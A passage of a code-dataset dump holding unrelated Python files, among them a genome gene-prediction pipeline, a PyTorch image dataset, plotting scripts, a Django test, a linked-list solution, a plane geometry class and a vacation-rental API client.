True:\n\t\tsubprocess.call(['mkdir','prodigal-genemark/nucleotides'])\n\tif os.path.exists(\"./prodigal-genemark/aminoacids\") != True:\n\t\tsubprocess.call(['mkdir','prodigal-genemark/aminoacids'])\n\n\tprodigal_gff = os.path.join('prodigalresults','gff','{}.gff'.format(i.split(\".\")[0]))\n\t#gets gff files from prodigal\n\tgenemark_gff = os.path.join('gms2results','gfffiles','{}.gff'.format(i.split(\".\")[0]))\n\t#gets gff files from genemark\n\tintersect1 = os.path.join('prodigal-genemark/gfffiles','{}intersect1.gff'.format(i.split(\".\")[0]))\n\n\tintersect2 = os.path.join('prodigal-genemark/gfffiles','{}intersect2.gff'.format(i.split(\".\")[0]))\n\t#gets intersect from genemark and prodigal\n\tcommon = os.path.join('prodigal-genemark/gfffiles','{}common.gff'.format(i.split(\".\")[0]))\n\n\t#gets common from genemark and prodigal\n\tunion = os.path.join('prodigal-genemark/gfffilesunion','{}union.gff'.format(i.split(\".\")[0]))\n\t#gets union\n\tbedtools_intersect1 = ['bedtools2/bin/bedtools intersect -f 1.0 -r -wa -v -a {} -b {} > {}'.format(prodigal_gff,genemark_gff,intersect1)]\n\n\tbedtools_intersect2 = ['bedtools2/bin/bedtools intersect -f 1.0 -r -wa -v -b {} -a {} > {}'.format(prodigal_gff,genemark_gff,intersect2)]\n\t#command for intersect\n\tbedtools_common = ['bedtools2/bin/bedtools intersect -f 1.0 -r -a {} -b {} > {}'.format(prodigal_gff,genemark_gff,common)]\n\t#command for common\n\n\tsubprocess.call(bedtools_intersect1,shell=True)\n\tsubprocess.call(bedtools_intersect2,shell=True)\n\tsubprocess.call(bedtools_common,shell=True)\n\n\tcat = ['cat {} {} {}> {}'.format(intersect1,intersect2,common,union)]\n\t#concatenates to get union\n\tsubprocess.call(cat,shell=True)\n\tdir = i\n\tcreatefastaindex = ['samtools-1.9/bin/samtools','faidx',dir]\n\t#creates fasta index\n\tdnatoaapy = os.path.join(home,\"nucltoprotein.py\")\n\tsubprocess.call(createfastaindex)\n\tnucleotides = os.path.join(home,\"prodigal-genemark/nucleotides\",\"{}.fna\".format(i.split(\".\")[0]))\n\tfastasequences = ['bedtools2/bin/bedtools','getfasta','-fo',nucleotides,'-fi',dir,'-bed',union]\n\tamino = os.path.join(home,\"prodigal-genemark/aminoacids\",\"{}.faa\".format(i.split(\".\")[0]))\n\tsubprocess.call(fastasequences)\n\t\t\n\t#subprocess.call(['python3',dnatoaapy,nucleotides,amino])\n\tsubprocess.call(['rm','-f','{}.fai'.format(dir)])\n\ndef barrnap(i):\n\tif os.path.exists(\"./barrnap_results\") != True:\n\t\tsubprocess.call(['mkdir','barrnap_results'])\n\tif os.path.exists(\"./barrnap_results/gfffiles\") != True:\n\t\tsubprocess.call(['mkdir','barrnap_results/gfffiles'])\n\tif os.path.exists(\"./barrnap_results/nucleotides\") != True:\n\t\tsubprocess.call(['mkdir','barrnap_results/nucleotides'])\n\n\n\tgff = os.path.join(\"barrnap_results/gfffiles\",\"barnap_{}.gff\".format(i.split(\".\")[0]))\n\tnucleotides = os.path.join(\"barrnap_results/nucleotides\",\"barrnap_{}.fna\".format(i.split(\".\")[0]))\n\tdir = i\n\tsubprocess.call(['barrnap/bin/barrnap --outseq {} < {} > {}'.format(nucleotides,dir,gff)],shell=True)\n\ndef aragorn(i):\n\tif os.path.exists(\"./aragorn_results\") != True:\n\t\tsubprocess.call(['mkdir','aragorn_results'])\n\tif os.path.exists(\"./aragorn_results/gfffiles\") != True:\n\t\tsubprocess.call(['mkdir','aragorn_results/gfffiles'])\n\tif os.path.exists(\"./aragorn_results/nucleotides\") != True:\n\t\tsubprocess.call(['mkdir','aragorn_results/nucleotides'])\n\n\tgff = os.path.join(\"aragorn_results/gfffiles\",\"aragorn_{}.gff\".format(i.split(\".\")[0]))\n\tnucleotides = os.path.join(\"aragorn_results/nucleotides\",\"aragorn_{}.fna\".format(i.split(\".\")[0]))\n\ttRNAtxt = os.path.join(\"aragorn_results\",\"{}.txt\".format(i.split(\".\")[0]))\n\tdir = i\n\n\tsubprocess.call([\"aragorn1.2.38/aragorn\",\"-t\",\"-m\",\"-gc1\",\"-w\",dir,\"-fo\",\"-o\",nucleotides])\n\tsubprocess.call([\"aragorn1.2.38/aragorn\",\"-t\",\"-m\",\"-gc1\",\"-w\",dir,\"-o\",tRNAtxt])\n\tsubprocess.call([\"/usr/bin/perl\",\"cnv_aragorn2gff.pl\",\"-i\",dir,\"-o\",tRNAgff, \"-gff-ver=2\"])\n\ndef join(a,b):\n\tsubprocess.call(['mkdir','arabarr'])\n\n\tfor i,j in zip(sorted(os.listdir(a)),sorted(os.listdir(b))):\n\t\tsubprocess.call('cat aragorn_results/nucleotides/{} barrnap_results/nucleotides/{} > arabarr/arabarr_{}.fna'.format(i,j,i.split(\"_\")[1]),shell=True)\n\t\ndef main():\n\t# Initialize argument parser for script flags\n\tparser = argparse.ArgumentParser(description='Predict genes from assembled prokaryotic genomes.')\n\t# Sets arguments, requirements to run script, and type of argument input\n\t# help='sets description to be used by default ./script.py -h'\n\tparser.add_argument('-f', help='File for assembled genome input.', required=True, type=str)\n\tparser.add_argument('-p', help='Run Prodigal for ab-initio protein coding gene predictor.', required=False, action='store_true')\n\tparser.add_argument('-g', help='Run GeneMarkS-2 for ab-initio protein coding gene predictor.', required=False, action='store_true')\n\tparser.add_argument('-nc', help='Runs Bar Aragorn andrnap for non-coding RNA prediction.', required=False, action='store_true')\n\tparser.add_argument('-ncs', help='Runs Aragorn and Barrnap independently.', required=False, action='store_true')\n\t\n\targs = parser.parse_args()\n\t# Error handling for file input path\n\t\t\n\t# Variable for current working directory\n\thome = os.getcwd()\n\t# Options to run either prodigal or genemark\n\tif args.p:\n\t\tprodigal(args.f)\n\tif args.g:\n\t\tgenemark(args.f)\n\t# Runs bedtools if both genemark and prodigal are selected\n\tif (args.p and args.g):\n\t\tbedtools_func(args.f, home)\n\t# Default mode to run both prodigal and genemark with bedtools_func\n\tif not args.p:\n\t\tif not args.g:\n\t\t\tprodigal(args.f)\n\t\t\tgenemark(args.f)\n\t\t\tbedtools_func(args.f, home)\n\t\n\t# Runs aragorn and barrnap if selected\n\tif args.nc:\n\t\taragorn(args.f)\n\t\tbarrnap(args.f)\n\t\tjoin('aragorn_results/nucleotides','barrnap_results/nucleotides')\n\tif args.ncs:\n\t\taragorn(args.f)\n\t\tbarrnap(args.f)\n\t\nif __name__ == '__main__':\n\tmain()","sub_path":"scripts/gene_prediction.py","file_name":"gene_prediction.py","file_ext":"py","file_size_in_byte":7931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"168423994","text":"import os\nimport cv2\nimport numpy as np\nimport torch.utils.data as data\nimport random\n\n\nclass ImageDataset(data.Dataset):\n \"\"\"\n Args:\n dataset_dir: directory of dataset\n transform: dataset transform\n \"\"\"\n\n def __init__(self, dataset_dir, sorted=False, transform=None):\n # 随机取1000张图片\n self.image_info = []\n self.transform = transform\n images = next(os.walk(dataset_dir))[2]\n if sorted:\n images.sort()\n for img in images:\n if img.endswith('.png') or img.endswith('.jpg') or img.endswith('.jpeg'):\n self.image_info.append(os.path.join(dataset_dir, img))\n\n def __len__(self):\n return len(self.image_info)\n\n def __getitem__(self, index):\n image = cv2.imread(self.image_info[index])\n # 将BGR转化为RGB通道顺序\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n if self.transform:\n image = self.transform(image)\n return image\n","sub_path":"coco.py","file_name":"coco.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"353112386","text":"# Import python modules\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nimport sys\n\ncurr_path = os.getcwd()\nos.chdir('../../../')\nsys.path.append(os.getcwd())\nos.chdir(curr_path)\n\nfrom static_classes.astro_helpers import AstroHelpers\n\n\n\n#%%\n'''\nMethod to plot the co-added spectra.\n'''\ndef plot_coadded_spectra(self,which,ax,xL=False):\n max_ = np.nanmax([np.nanmax(AstroHelpers.get_coadded_spectra(self,'2deg')),np.nanmax(AstroHelpers.get_coadded_spectra(self,'2deg_NN')),\n np.nanmax(AstroHelpers.get_coadded_spectra(self,'NM')),np.nanmax(AstroHelpers.get_coadded_spectra(self,'NM_NN')),\n np.nanmax(AstroHelpers.get_coadded_spectra(self,30))])\n min_ = 0\n \n prof = AstroHelpers.get_coadded_spectra(self,which) \n \n if which == 30:\n bins = AstroHelpers.get_bin_edges(header=self.header,ppv=self.ppv*self.binaryMask)\n \n else:\n bins = AstroHelpers.get_bin_edges(header=self.header,ppv=self.ppv)\n \n #plot profile as a function of bins\n plt.plot(bins,prof)\n \n #Set x and y lims\n plt.ylim(min_,max_)\n plt.xlim(self.header['VMIN'],self.header['VMAX'])\n \n #Set tick and label paramaters\n plt.tick_params(axis='y', which='both',labelleft='off',labelright='on')\n \n #Set axis labels and title \n ax.set_ylabel('$K/dv$', fontsize=self.fontsize)\n ax.yaxis.set_label_position(\"right\")\n \n if xL == True:\n plt.xlabel('V [km $s^{-1}$]', fontsize=self.fontsize)\n plt.xticks([-10,0,10],['-10','0','10'],fontsize=self.fontsize)\n else:\n plt.xticks([-10,0,10],['','',''])\n \n ax.tick_params(direction='in')\n \n \n #Set Fontsize of x ticks\n plt.yticks(fontsize=self.fontsize)","sub_path":"APJ_Paper/classes/plot/subclasses/simline_plot/class_methods/plot_coadded_spectra.py","file_name":"plot_coadded_spectra.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"461643216","text":"\nimport pandas\nimport matplotlib.pyplot as plt\nimport argparse\nfrom pathlib import Path\n\nparser = argparse.ArgumentParser(description='Plot training history')\nparser.add_argument(\n 'input',\n type=Path,\n help='File from which to read the text')\nparser.add_argument(\n '--no_save',\n action='store_true',\n help='Save the figure to pdf file (same name) (default: %(default)s)')\n\nargs = parser.parse_args()\n\ndf = pandas.read_csv(args.input.open('r'))\ndf = df.set_index('epoch')\nfig = df.plot()\nplt.grid(b=True, which='both')\nif not args.no_save:\n saved_fig = args.input.with_suffix('.pdf')\n plt.savefig(saved_fig, format='pdf')\n print(\"Saved figure to: {}\".format(saved_fig))\nplt.show()\n","sub_path":"draw_history.py","file_name":"draw_history.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"133700103","text":"from django.test import TestCase\n\nfrom books.models import Books\nfrom books.serializers import BookSerializer\n\n\nclass BookSerializersTestCase(TestCase):\n def test_ok(self):\n book_1 = Books.objects.create(\n title='Test1 Titile1',\n author_name='Test1 author1',\n description='Test1 description1'\n )\n book_2 = Books.objects.create(\n title='Test2 Titile2',\n author_name='222aaaaaaaaaaaaaaaa',\n description='Test2 description2'\n )\n data = BookSerializer([book_1, book_2], many=True).data\n expected_data = [\n {\n 'id': book_1.id,\n 'title': 'Test1 Titile1',\n 'author_name': 'Test1 author1',\n 'description': 'Test1 description1'\n },\n {\n 'id': book_2.id,\n 'title': 'Test2 Titile2',\n 'author_name': '222aaaaaaaaaaaaaaaa',\n 'description': 'Test2 description2',\n }\n\n ]\n self.assertEqual(expected_data, data)\n print(expected_data)\n print(data)\n","sub_path":"tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":1132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"635917798","text":"#!/usr/bin/python\n\ndef main():\n data = open(\"users.dat\", \"r\")\n outfile = open(\"usersok.dat\", \"w\")\n\n for line in data:\n linep = line.rstrip(\"\\n\")\n linep = line.split(\"::\")\n if linep[1] == \"M\":\n gender = 11\n else:\n gender = 12\n uid = int(linep[0])\n age = int(linep[2])\n job = int(linep[3]) + 100\n\n out = \"%d %d\\n%d %d\\n%d %d\\n\" % (uid, gender, uid, age, uid, job)\n outfile.write(out)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"users2mymedialite.py","file_name":"users2mymedialite.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"491234675","text":"# coding=utf-8\n\n\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution(object):\n def reverseKGroup(self, head, k):\n dummy = ListNode(0)\n dummy.next = head\n\n pre = dummy\n end = dummy\n\n while end:\n for i in range(k):\n if not end:\n break\n end = end.next\n if not end:\n break\n start = pre.next\n after = end.next\n end.next = None\n pre.next = self.reverse(start)\n start.next = after\n\n pre = end = start\n return dummy.next\n\n def reverse(self, head):\n pre = None\n curr = head\n while curr:\n curr.next, pre, curr = pre, curr, curr.next\n return pre\n\n","sub_path":"1-50/025ReverseKGroupHard.py","file_name":"025ReverseKGroupHard.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"77676242","text":"# -*- coding: utf-8 -*-\n\nfrom decimal import Decimal, getcontext\n\nfrom vector import Vector\n\ngetcontext().prec = 30\n\n\nclass Plane(object):\n\n NO_NONZERO_ELTS_FOUND_MSG = 'No nonezero elements found'\n\n def __init__(self, normal_vector=None, constant_term=None):\n self.dimension = 3\n\n if not normal_vector:\n all_zeros = ['0']*self.dimension\n normal_vector = Vector(all_zeros)\n self.normal_vector = normal_vector\n\n if not constant_term:\n constant_term = Decimal('0')\n self.constant_term = Decimal(constant_term)\n\n self.set_basepoint()\n\n\n def set_basepoint(self):\n try:\n n = self.normal_vector.coordinates\n c = self.constant_term\n basepoint_coords = ['0']*self.dimension\n\n initial_index = Plane.first_nonzero_index(n)\n initial_coefficient = n[initial_index]\n\n basepoint_coords[initial_index] = c/initial_coefficient\n self.basepoint = Vector(basepoint_coords)\n\n except Exception as e:\n if str(e) == Plane.NO_NONZERO_ELTS_FOUND_MSG:\n self.basepoint = None\n else:\n raise e\n\n\n def __str__(self):\n\n num_decimal_places = 3\n\n def write_coefficient(coefficient, is_initial_term=False):\n coefficient = round(coefficient, num_decimal_places)\n if coefficient % 1 == 0:\n coefficient = int(coefficient)\n\n output = ''\n\n if coefficient < 0:\n output += '-'\n if coefficient > 0 and not is_initial_term:\n output += '+'\n\n if not is_initial_term:\n output += ' '\n\n if abs(coefficient) != 1:\n output += '{}'.format(abs(coefficient))\n\n return output\n\n n = self.normal_vector.coordinates\n\n try:\n initial_index = Plane.first_nonzero_index(n)\n terms = [write_coefficient(n[i], is_initial_term=(i==initial_index)) + 'x_{}'.format(i+1)\n for i in range(self.dimension) if round(n[i], num_decimal_places) != 0]\n output = ' '.join(terms)\n\n except Exception as e:\n if str(e) == self.NO_NONZERO_ELTS_FOUND_MSG:\n output = '0'\n else:\n raise e\n\n constant = round(self.constant_term, num_decimal_places)\n if constant % 1 == 0:\n constant = int(constant)\n output += ' = {}'.format(constant)\n\n return output\n\n\n @staticmethod\n def first_nonzero_index(iterable):\n for k, item in enumerate(iterable):\n if not MyDecimal(item).is_near_zero():\n return k\n raise Exception(Plane.NO_NONZERO_ELTS_FOUND_MSG)\n\n def is_parallel_to(self, p):\n return self.normal_vector.is_parallel_to(p.normal_vector)\n \n def __eq__(self, p):\n if self.normal_vector.iszero():\n if not p.normal_vector.iszero():\n return False\n else:\n diff = self.constant_term - p.constant_term\n return MyDecimal(diff).is_near_zero()\n elif p.normal_vector.iszero():\n return False\n \n return (self.is_parallel_to(p) and \n self.basepoint.minus(p.basepoint).is_orthogonal_to(self.normal_vector))\n \n def gaussian(self, p1, p2):\n n = [self.normal_vector, p1.normal_vector, p2.normal_vector]\n t = [self.constant_term, p1.constant_term, p2.constant_term]\n z = sorted([[first_nonzero_index(x[0])+list(x)] for x in zip(n,t)])\n for x in xrange(len(z)-1):\n if z[x][0] bool:\n return urlparse(url).scheme.lower() == 'https'\n\n\nclass VacasaConnect:\n \"\"\"This class serves as a wrapper for the Vacasa Connect API.\"\"\"\n\n _access_token = None\n _refresh_token = None\n\n def __init__(self,\n api_key: str,\n api_secret: str,\n endpoint: str = 'https://connect.vacasa.com',\n timezone: str = 'UTC',\n language: str = 'en-US',\n currency: str = 'USD'\n ):\n \"\"\"Initialize an instance of the VacasaConnect class.\n\n Args:\n api_key: Your Vacasa Connect API key.\n api_secret: Your Vacasa Connect API secret.\n endpoint: The URL of the Vacasa Connect API.\n timezone: UTC or a long-form version of a timezone from the tz\n database. Example: 'America/New_York'. See\n https://en.wikipedia.org/wiki/List_of_tz_database_time_zones\n for more info.\n language: The language you will accept. If no localized content\n can be found, an error response is returned. Allowed format is\n {{ISO-639-1 Code}}-{{ISO 3166-1 Alpha-2 Code}}.\n currency: An ISO-4217 currency code. Send to request monetary\n values in this currency.\n \"\"\"\n if not is_https_url(endpoint):\n raise ValueError(f\"`endpoint` scheme should be https\")\n self.api_key = api_key\n self.api_secret = api_secret\n self.endpoint = endpoint.rstrip('/')\n self.timezone = timezone\n self.language = language\n self.currency = currency\n self._populate_tokens()\n\n def _populate_tokens(self):\n \"\"\"Decide if current tokens need refreshed and populate them.\"\"\"\n # generate a token if we don't have one yet\n if self._access_token is None:\n tokens = self._get_new_tokens()\n self._access_token = tokens.get('access_token')\n self._refresh_token = tokens.get('refresh_token')\n else:\n now = pendulum.now()\n expiration = pendulum.parse(self._refresh_token['expires_at'])\n\n # refresh the token if it has expired\n if now > expiration:\n tokens = self._refresh_tokens()\n self._access_token = tokens.get('access_token')\n self._refresh_token = tokens.get('refresh_token')\n\n def _get_new_tokens(self) -> dict:\n \"\"\"Generate new access and refresh tokens.\"\"\"\n timestamp = int(pendulum.now().timestamp())\n payload = {\n 'data': {\n 'api_key': self.api_key,\n 'timestamp': timestamp,\n 'signature': self._generate_signature(timestamp)\n }\n }\n headers = {'content-type': 'application/json'}\n\n r = self._post(f\"{self.endpoint}/auth\", json=payload, headers=headers)\n tokens = r.json().get('data', {}).get('attributes', {})\n self._validate_tokens(tokens)\n\n return tokens\n\n def _refresh_tokens(self) -> dict:\n \"\"\"Refresh existing tokens. Necessary when they expire.\"\"\"\n url = f\"{self.endpoint}/auth/refresh\"\n payload = {\n 'data': {\n 'refresh_token': self._refresh_token['token']\n }\n }\n r = self._post(url, json=payload)\n tokens = r.json().get('data', {}).get('attributes', {})\n self._validate_tokens(tokens)\n\n return tokens\n\n @staticmethod\n def _validate_tokens(tokens):\n \"\"\"Raise errors for incomplete tokens.\"\"\"\n if 'access_token' not in tokens:\n raise LookupError(\"access_token not found\")\n\n if 'refresh_token' not in tokens:\n raise LookupError(\"refresh_token not found\")\n\n def _headers(self, language=None, currency=None) -> dict:\n \"\"\"Build common headers.\"\"\"\n self._populate_tokens()\n\n return {\n 'Authorization': f\"Bearer {self._access_token['token']}\",\n 'Accept-Language': self.language if language is None else language,\n 'X-Accept-Currency': self.currency if currency is None else currency,\n 'X-Accept-Timezone': self.timezone\n }\n\n def _generate_signature(self, timestamp: int) -> str:\n \"\"\"Create a hash signature used for generating new tokens.\"\"\"\n secret = bytes(self.api_secret, 'utf-8')\n message = f\"{self.api_key}{timestamp}{self.api_secret}\".encode('utf-8')\n\n return hmac.new(secret, message, hashlib.sha256).hexdigest()\n\n @staticmethod\n def __get(url, headers: dict = None, params: dict = None):\n \"\"\"HTTP GET request helper.\"\"\"\n if headers is None:\n headers = {}\n\n r = requests.get(url, headers=headers, params=params)\n r.raise_for_status()\n\n return r\n\n def _get(self, url, headers: dict = None, params: dict = None, retry: bool = True):\n \"\"\"HTTP Get helper with optional retrying.\"\"\"\n if retry:\n return retry_call(\n self.__get,\n fargs=[url, headers, params],\n exceptions=requests.exceptions.RequestException,\n tries=5,\n delay=1,\n backoff=2\n )\n else:\n return self.__get(url, headers, params)\n\n @staticmethod\n def _post(url, data: dict = None, json: dict = None, headers: dict = None):\n \"\"\"HTTP POST request helper.\"\"\"\n if not headers:\n headers = {}\n\n r = requests.post(url, data=data, json=json, headers=headers)\n r.raise_for_status()\n\n return r\n\n def _ensure_url_has_host(self, url: str):\n \"\"\"Insurance against the API returning a URL that lacks a host name\"\"\"\n parsed_url = urlparse(url)\n\n if not parsed_url.hostname:\n valid_host = urlparse(self.endpoint).hostname\n parsed_url = parsed_url._replace(netloc=valid_host)\n return urlunparse(parsed_url)\n\n return url\n\n def _iterate_pages(self, url: str, headers: dict, params: dict = None):\n \"\"\"Iterate over paged results.\"\"\"\n more_pages = True\n\n while more_pages:\n r = self._get(url, headers=headers, params=params)\n yield from r.json()['data']\n\n if r.json().get('links').get('next'):\n more_pages = True\n url = self._ensure_url_has_host(r.json()['links']['next'])\n else:\n more_pages = False\n\n @staticmethod\n def _add_meta_param(params: dict, meta_value: str) -> dict:\n \"\"\"Add to the include_meta comma-delimited string parameter.\"\"\"\n meta_param = params.get('include_meta', '')\n # A leading comma is ignored by the connect api\n meta_param += f\",{meta_value}\"\n params['include_meta'] = meta_param\n\n return params\n\n @staticmethod\n def _add_include_param(params: dict, include_value: str) -> dict:\n \"\"\"Add to the include_meta comma-delimited string parameter.\"\"\"\n include_param = params.get('include', '')\n if include_param:\n include_param += \",\"\n include_param += f\"{include_value}\"\n params['include'] = include_param\n\n return params\n\n def get(self, uri, params: dict = None):\n url = f\"{self.endpoint}/v1/{uri}\"\n r = self._get(url, headers=self._headers(), params=params)\n\n return r.json()\n\n def get_units(self,\n params: dict = None,\n include_photos: bool = False,\n include_terminated: bool = False,\n include_amenities: bool = False\n ):\n \"\"\"Retrieve multiple units.\n\n Args:\n params: A dict containing a key for each query string parameter\n with a corresponding value. See https://connect.vacasa.com/\n for more detail.\n include_photos: Whether or not to include a list of photo URLs with\n each unit.\n include_terminated: Whether or not to include units that are\n currently terminated or pending termination.\n include_amenities: Whether or not to include key/values of each\n amenity with each unit.\n\n Yields:\n An iterator of units. Each unit is a dict.\n \"\"\"\n if params is None:\n params = {}\n\n if include_photos:\n params = self._add_meta_param(params, 'photos_list')\n\n if include_amenities:\n params = self._add_meta_param(params, 'amenities_map')\n\n if not include_terminated:\n params['filter[terminated]'] = 0\n\n url = f\"{self.endpoint}/v1/units\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_unit_by_id(self, unit_id: int, params: dict = None) -> dict:\n \"\"\"Retrieve a single unit by its primary identifier.\n\n Args:\n unit_id: The unique identifier for the individual unit.\n params: A dict containing a key for each query string parameter\n with a corresponding value. See https://connect.vacasa.com/\n for more detail.\n\n Returns:\n A dict containing attributes about the individual unit.\n \"\"\"\n url = f\"{self.endpoint}/v1/units/{unit_id}\"\n r = self._get(url, headers=self._headers(), params=params)\n\n return r.json()['data']\n\n def get_availability(self, params: dict = None):\n \"\"\"Retrieve availabilities.\n\n Args:\n params: A dict containing a key for each query string parameter\n with a corresponding value. See https://connect.vacasa.com/\n for more detail.\n\n Yields:\n An iterator of availabilities. Each availability is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/availability\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_availability_by_id(self, unit_id: int, params: dict = None):\n \"\"\"Retrieve availabilities for a single unit.\n\n Args:\n unit_id: The unique identifier for the individual unit.\n params: A dict containing a key for each query string parameter\n with a corresponding value. See https://connect.vacasa.com/\n for more detail.\n\n Yields:\n An iterator of availabilities. Each availability is a dict.\n \"\"\"\n if params is None:\n params = {}\n params['filter[unit_id]'] = unit_id\n\n return self.get_availability(params)\n\n def get_amenities(self,\n params: dict = None,\n include_categories: bool = False,\n include_content: bool = False,\n include_options: bool = False\n ):\n \"\"\"Retrieve a master list of all amenities\n\n Yields:\n An iterator of amenities. Each amenity is a dict.\n \"\"\"\n if params is None:\n params = {}\n\n url = f\"{self.endpoint}/v1/amenities\"\n headers = self._headers()\n\n if include_categories:\n params = self._add_include_param(params, 'categories')\n\n if include_content:\n params = self._add_include_param(params, 'content')\n\n if include_options:\n params = self._add_include_param(params, 'options')\n\n return self._iterate_pages(url, headers, params)\n\n def get_amenities_groups(self, params: dict = None):\n \"\"\"Retrieve a list of amenity groups\n\n Yields:\n An iterator of amenity groups. Each amenity group is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/amenities-groups\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_unit_amenities(self, params: dict = None):\n \"\"\"Retrieve a list of all amenities for all units\n\n Yields:\n An iterator of unit amenities. Each unit amenity is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/unit-amenities\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_unit_amenities_reduced(self, params: dict = None):\n \"\"\"Retrieve a smaller subset of amenity attributes for all units\n\n Yields:\n An iterator of unit amenities. Each unit amenity is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/unit-amenities-reduced\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_cities(self, params: dict = None):\n \"\"\"Retrieve a list of all cities\n\n Yields:\n An iterator of cities. Each city is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/cities\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_states(self, params: dict = None):\n \"\"\"Retrieve a list of all states\n\n Yields:\n An iterator of states. Each state is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/states\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_countries(self, params: dict = None):\n \"\"\"Retrieve a list of all countries\n\n Yields:\n An iterator of countries. Each country is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/countries\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_destinations(self, params: dict = None):\n \"\"\"Retrieve a list of all destinations\n\n Yields:\n An iterator of destinations. Each destination is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/destinations\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_regions(self, params: dict = None):\n \"\"\"Retrieve a list of all regions\n\n Yields:\n An iterator of regions. Each region is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/regions\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_region_phones(self, params: dict = None):\n \"\"\"Retrieve a list of all region-phones\n\n Yields:\n An iterator of region-phones. Each region-phone is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/region-phones\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_region_cities(self, params: dict = None):\n \"\"\"Retrieve a list of region-cities\n\n Yields:\n An iterator of region-cities. Each region-city is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/region-cities\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_guarantees(self, params: dict = None):\n \"\"\"Retrieve a list of guarantees\n\n Yields:\n An iterator of guarantees. Each guarantee is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/guarantees\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_guarantee_dates(self, params: dict = None):\n \"\"\"Retrieve a list of guarantee_dates\n\n Yields:\n An iterator of guarantee_dates. Each guarantee_date is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/guarantee-dates\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_reviews(self, params: dict = None):\n \"\"\"Retrieve a list of reviews\n\n Yields:\n An iterator of reviews. Each review is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/reviews\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_reservations(self, params: dict = None):\n \"\"\"Retrieve a list of reservations\n\n Yields:\n An iterator of reservations. Each reservation is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/reservations\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n def get_offices(self, params: dict = None):\n \"\"\"Retrieve a list of Vacasa local office locations\n\n Yields:\n An iterator of office locations. Each office location is a dict.\n \"\"\"\n url = f\"{self.endpoint}/v1/offices\"\n headers = self._headers()\n\n return self._iterate_pages(url, headers, params)\n\n @staticmethod\n def _trip_protection_to_integer(trip_protection: bool) -> int:\n \"\"\"Convert from True/False/None to 1/0/-1\"\"\"\n if trip_protection is None:\n return 0\n return 1 if trip_protection else -1\n\n def get_quote(self,\n unit_id: int,\n arrival: str,\n departure: str,\n adults: int,\n children: Optional[int] = 0,\n pets: Optional[int] = 0,\n trip_protection: Optional[bool] = None,\n discount_id: Optional[int] = None,\n language=None,\n currency=None\n ) -> dict:\n \"\"\" Get a price quote for a given stay\n\n Args:\n unit_id: A Vacasa Unit ID\n arrival: Checkin date in 'YYYY-MM-DD' format\n departure: Checkout date in 'YYYY-MM-DD' format\n adults: How many adults will be staying\n children: How many children will be staying\n pets: How many pets will be staying\n trip_protection: Has the user requested trip protection?\n -1 No\n 0 TBD\n 1 Yes\n discount_id: optional\n language: e.g. 'en-US' or 'es-ES' (optional)\n currency: e.g. 'USD' or 'EUR' (optional)\n\n Returns: dict\n\n \"\"\"\n url = f\"{self.endpoint}/v1/quotes\"\n headers = self._headers(language, currency)\n\n params = {\n 'adults': adults,\n 'children': children,\n 'pets': pets,\n 'unit_id': unit_id,\n 'arrival': arrival,\n 'departure': departure,\n }\n\n if discount_id is not None:\n params['discount_id'] = discount_id\n\n params['trip_protection'] = self._trip_protection_to_integer(trip_protection)\n\n return self._get(url, headers, params, retry=False).json()\n\n def create_reservation(self,\n unit_id: int,\n arrival: str,\n departure: str,\n email: str,\n address: dict,\n adults: int,\n quote_id: str,\n first_name: str,\n last_name: str,\n account_number: str,\n exp_mmyy: str,\n cvv: Optional[str] = None,\n phone: Optional[str] = None,\n children: int = 0,\n pets: int = 0,\n 